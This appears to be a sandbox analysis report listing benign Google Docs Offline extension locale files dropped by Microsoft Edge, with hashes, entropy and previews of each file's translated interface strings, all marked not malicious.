                                                                                                                                                                                                                                                                Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):961
                                                                                                                                                                                                                                                                Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):959
                                                                                                                                                                                                                                                                Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):968
                                                                                                                                                                                                                                                                Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):838
                                                                                                                                                                                                                                                                Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):911
                                                                                                                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):972
                                                                                                                                                                                                                                                                Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):990
                                                                                                                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):935
                                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir1056_1718937468\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                Malicious:false
